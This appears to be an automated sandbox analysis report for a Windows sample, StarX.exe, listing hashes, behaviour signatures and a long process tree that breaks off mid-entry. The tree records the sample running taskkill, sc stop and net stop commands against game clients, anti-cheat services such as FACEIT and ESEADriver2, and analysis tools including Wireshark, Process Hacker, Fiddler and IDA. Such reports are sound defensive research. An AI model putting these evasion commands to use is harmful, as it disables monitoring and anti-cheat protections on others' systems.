Analysis

  • max time kernel
    59s
  • max time network
    70s
  • platform
    windows10-1703_x64
  • resource
    win10-20230915-en
  • resource tags

    arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
  • submitted
    23/09/2023, 21:25

General

  • Target

    StarX.exe

  • Size

    52KB

  • MD5

    9e7c9bb992e37e63eaedbcb1c7e0df9c

  • SHA1

    042d1051b07b8f0631223499cf0d72a612110e6c

  • SHA256

    c346225d27dd7d5a504cc6e517485b10de8e54cee73840eca31f94d3d036e06e

  • SHA512

    5116e82484409b2b6888931c765adf06c78365d5ea4d0f61690a4ed5a6c0d3febb44ab79039236f9ae5ce300e0d860f89a463cf2e6d0da6ee0ceb1c1efa5ee71

  • SSDEEP

    1536:4wywEu6xc5sCq0cPRQRV7RZA6ngn6/SZz:4hu9tc09ngn6/SZz

Score
8/10

Malware Config

Signatures

  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 33 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Kills process with taskkill 41 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\StarX.exe
    "C:\Users\Admin\AppData\Local\Temp\StarX.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3588
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im EpicGamesLauncher.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:768
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3584
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im FortniteClient-Win64-Shipping.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4124
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop FACEIT >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\system32\net.exe
        net stop FACEIT
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3396
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop FACEIT
          4⤵
            PID:2168
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4624
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im HTTPDebuggerUI.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3148
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c net stop FACEIT >nul 2>&1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3416
        • C:\Windows\system32\net.exe
          net stop FACEIT
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4672
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop FACEIT
            4⤵
              PID:912
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c net stop ESEADriver2 >nul 2>&1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4520
          • C:\Windows\system32\net.exe
            net stop ESEADriver2
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4540
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop ESEADriver2
              4⤵
                PID:3512
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c net stop ESEADriver2 >nul 2>&1
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:748
            • C:\Windows\system32\net.exe
              net stop ESEADriver2
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:760
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop ESEADriver2
                4⤵
                  PID:4388
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1900
              • C:\Windows\system32\taskkill.exe
                taskkill /f /im HTTPDebuggerSvc.exe
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:640
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2932
              • C:\Windows\system32\sc.exe
                sc stop HTTPDebuggerPro
                3⤵
                • Launches sc.exe
                PID:508
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2344
              • C:\Windows\system32\sc.exe
                sc stop HTTPDebuggerPro
                3⤵
                • Launches sc.exe
                PID:656
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2116
              • C:\Windows\system32\sc.exe
                sc stop HTTPDebuggerPro
                3⤵
                • Launches sc.exe
                PID:4944
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4252
              • C:\Windows\system32\sc.exe
                sc stop KProcessHacker3
                3⤵
                • Launches sc.exe
                PID:5080
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4112
              • C:\Windows\system32\sc.exe
                sc stop KProcessHacker3
                3⤵
                • Launches sc.exe
                PID:2032
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
              2⤵
                PID:3516
                • C:\Windows\system32\sc.exe
                  sc stop KProcessHacker2
                  3⤵
                  • Launches sc.exe
                  PID:3076
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                2⤵
                  PID:4832
                  • C:\Windows\system32\taskkill.exe
                    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2544
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
                  2⤵
                    PID:1232
                    • C:\Windows\system32\sc.exe
                      sc stop KProcessHacker2
                      3⤵
                      • Launches sc.exe
                      PID:3528
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                    2⤵
                      PID:756
                      • C:\Windows\system32\sc.exe
                        sc stop KProcessHacker1
                        3⤵
                        • Launches sc.exe
                        PID:5092
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                      2⤵
                        PID:4468
                        • C:\Windows\system32\sc.exe
                          sc stop KProcessHacker1
                          3⤵
                          • Launches sc.exe
                          PID:4192
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
                        2⤵
                          PID:1168
                          • C:\Windows\system32\sc.exe
                            sc stop wireshark
                            3⤵
                            • Launches sc.exe
                            PID:2060
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                          2⤵
                            PID:1584
                            • C:\Windows\system32\taskkill.exe
                              taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4148
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
                            2⤵
                              PID:2028
                              • C:\Windows\system32\sc.exe
                                sc stop wireshark
                                3⤵
                                • Launches sc.exe
                                PID:948
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
                              2⤵
                                PID:4044
                                • C:\Windows\system32\sc.exe
                                  sc stop npf
                                  3⤵
                                  • Launches sc.exe
                                  PID:3836
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq HTTPDebuggerSvc*" /IM * /F /T >nul 2>&1
                                2⤵
                                  PID:2452
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /FI "IMAGENAME eq HTTPDebuggerSvc*" /IM * /F /T
                                    3⤵
                                    • Kills process with taskkill
                                    PID:2068
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
                                  2⤵
                                    PID:5116
                                    • C:\Windows\system32\sc.exe
                                      sc stop npf
                                      3⤵
                                      • Launches sc.exe
                                      PID:2156
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                    2⤵
                                      PID:3920
                                      • C:\Windows\system32\taskkill.exe
                                        taskkill /f /im HTTPDebuggerUI.exe
                                        3⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1792
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c net stop FACEIT >nul 2>&1
                                      2⤵
                                        PID:4568
                                        • C:\Windows\system32\net.exe
                                          net stop FACEIT
                                          3⤵
                                            PID:4864
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 stop FACEIT
                                              4⤵
                                                PID:1668
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq HTTPDebuggerUI*" /IM * /F /T >nul 2>&1
                                            2⤵
                                              PID:2596
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill /FI "IMAGENAME eq HTTPDebuggerUI*" /IM * /F /T
                                                3⤵
                                                • Kills process with taskkill
                                                PID:2780
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                              2⤵
                                                PID:3620
                                                • C:\Windows\system32\taskkill.exe
                                                  taskkill /f /im HTTPDebuggerSvc.exe
                                                  3⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3756
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c net stop ESEADriver2 >nul 2>&1
                                                2⤵
                                                  PID:4552
                                                  • C:\Windows\system32\net.exe
                                                    net stop ESEADriver2
                                                    3⤵
                                                      PID:4904
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 stop ESEADriver2
                                                        4⤵
                                                          PID:4676
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq KsDumperClient*" /IM * /F /T >nul 2>&1
                                                      2⤵
                                                        PID:1692
                                                        • C:\Windows\system32\taskkill.exe
                                                          taskkill /FI "IMAGENAME eq KsDumperClient*" /IM * /F /T
                                                          3⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:208
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                        2⤵
                                                          PID:200
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop HTTPDebuggerPro
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:2396
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                          2⤵
                                                            PID:3216
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop HTTPDebuggerPro
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:2352
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
                                                            2⤵
                                                              PID:3612
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop KProcessHacker3
                                                                3⤵
                                                                • Launches sc.exe
                                                                PID:1076
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                              2⤵
                                                                PID:1252
                                                                • C:\Windows\system32\taskkill.exe
                                                                  taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                  3⤵
                                                                  • Kills process with taskkill
                                                                  PID:4236
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq FolderChangesView*" /IM * /F /T >nul 2>&1
                                                                2⤵
                                                                  PID:2636
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    taskkill /FI "IMAGENAME eq FolderChangesView*" /IM * /F /T
                                                                    3⤵
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4800
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
                                                                  2⤵
                                                                    PID:348
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc stop KProcessHacker2
                                                                      3⤵
                                                                      • Launches sc.exe
                                                                      PID:3848
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                    2⤵
                                                                      PID:2412
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                        3⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3408
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                                                                      2⤵
                                                                        PID:2040
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop KProcessHacker1
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:4300
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ProcessHacker*" /IM * /F /T >nul 2>&1
                                                                        2⤵
                                                                          PID:4332
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            taskkill /FI "IMAGENAME eq ProcessHacker*" /IM * /F /T
                                                                            3⤵
                                                                            • Kills process with taskkill
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2828
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
                                                                          2⤵
                                                                            PID:2484
                                                                            • C:\Windows\system32\sc.exe
                                                                              sc stop wireshark
                                                                              3⤵
                                                                              • Launches sc.exe
                                                                              PID:2528
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                            2⤵
                                                                              PID:4840
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                3⤵
                                                                                • Kills process with taskkill
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5068
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
                                                                              2⤵
                                                                                PID:4344
                                                                                • C:\Windows\system32\sc.exe
                                                                                  sc stop npf
                                                                                  3⤵
                                                                                  • Launches sc.exe
                                                                                  PID:2296
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq KsDumperClient*" /IM * /F /T >nul 2>&1
                                                                                2⤵
                                                                                  PID:4136
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    taskkill /FI "IMAGENAME eq KsDumperClient*" /IM * /F /T
                                                                                    3⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5000
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                                                                  2⤵
                                                                                    PID:1260
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                                                                      3⤵
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5060
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                                                                    2⤵
                                                                                      PID:4080
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        taskkill /f /im HTTPDebuggerUI.exe
                                                                                        3⤵
                                                                                        • Kills process with taskkill
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3240
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq procmon*" /IM * /F /T >nul 2>&1
                                                                                      2⤵
                                                                                        PID:4872
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /FI "IMAGENAME eq procmon*" /IM * /F /T
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4580
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
                                                                                        2⤵
                                                                                          PID:3764
                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                            taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
                                                                                            3⤵
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2696
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                                                                          2⤵
                                                                                            PID:1556
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              taskkill /f /im HTTPDebuggerSvc.exe
                                                                                              3⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3264
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
                                                                                            2⤵
                                                                                              PID:3092
                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
                                                                                                3⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1540
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq idaq*" /IM * /F /T >nul 2>&1
                                                                                              2⤵
                                                                                                PID:5084
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  taskkill /FI "IMAGENAME eq idaq*" /IM * /F /T
                                                                                                  3⤵
                                                                                                  • Kills process with taskkill
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4624
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                2⤵
                                                                                                  PID:3148
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop HTTPDebuggerPro
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:4180
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                  2⤵
                                                                                                    PID:760
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                      3⤵
                                                                                                      • Kills process with taskkill
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:748
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
                                                                                                    2⤵
                                                                                                      PID:4848
                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                        taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
                                                                                                        3⤵
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4328
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq idaq64*" /IM * /F /T >nul 2>&1
                                                                                                      2⤵
                                                                                                        PID:684
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          taskkill /FI "IMAGENAME eq idaq64*" /IM * /F /T
                                                                                                          3⤵
                                                                                                          • Kills process with taskkill
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:508
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                        2⤵
                                                                                                          PID:2344
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                            3⤵
                                                                                                            • Kills process with taskkill
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1136
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                          2⤵
                                                                                                            PID:4908
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                              3⤵
                                                                                                              • Kills process with taskkill
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4972
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                            2⤵
                                                                                                              PID:4576
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                3⤵
                                                                                                                • Kills process with taskkill
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3076
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
                                                                                                              2⤵
                                                                                                                PID:3528
                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                  taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
                                                                                                                  3⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3744
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                                                                                                2⤵
                                                                                                                  PID:2660
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:2468
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                                  2⤵
                                                                                                                    PID:5072
                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                                      3⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4640
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
                                                                                                                    2⤵
                                                                                                                      PID:3708
                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                        taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
                                                                                                                        3⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2108
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                                      2⤵
                                                                                                                        PID:2164
                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                          taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                          3⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:948
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
                                                                                                                        2⤵
                                                                                                                          PID:3964
                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                            taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
                                                                                                                            3⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4104
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                                          2⤵
                                                                                                                            PID:2388
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc stop HTTPDebuggerPro
                                                                                                                              3⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:2156
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
                                                                                                                            2⤵
                                                                                                                              PID:3936
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
                                                                                                                                3⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2068
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
                                                                                                                              2⤵
                                                                                                                                PID:2148
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop KProcessHacker3
                                                                                                                                  3⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:1084
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
                                                                                                                                2⤵
                                                                                                                                  PID:3560
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop KProcessHacker2
                                                                                                                                    3⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:3844
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                                                  2⤵
                                                                                                                                    PID:4788
                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                                                      3⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4864
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                                                                                                                                    2⤵
                                                                                                                                      PID:1864
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc stop KProcessHacker1
                                                                                                                                        3⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:2780
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
                                                                                                                                      2⤵
                                                                                                                                        PID:4196
                                                                                                                                        • C:\Windows\system32\taskkill.exe
